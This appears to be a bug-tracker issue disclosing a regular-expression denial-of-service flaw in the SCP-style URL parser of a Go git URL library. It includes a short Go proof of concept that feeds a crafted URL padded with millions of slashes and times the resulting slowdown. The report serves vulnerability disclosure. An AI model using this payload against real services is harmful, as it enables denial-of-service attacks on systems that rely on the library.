Security issue in regex #24
Description
The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside directory path of the git url. I managed to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:
var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay
malicious_url := "6en6ar@-:0////" + payload + "\"
begin := time.Now()
//u, err := giturls.ParseScp("remote_username@10.10.0.2:/remote/directory")// normal git url
_, err := giturls.ParseScp(malicious_url)
if err != nil {
fmt.Errorf("[ - ] Error ->" + err.Error())
}
//fmt.Println("[ + ] Url --> " + u.Host)
elapse := time.Since(begin)
fmt.Printf("Function took %s", elapse)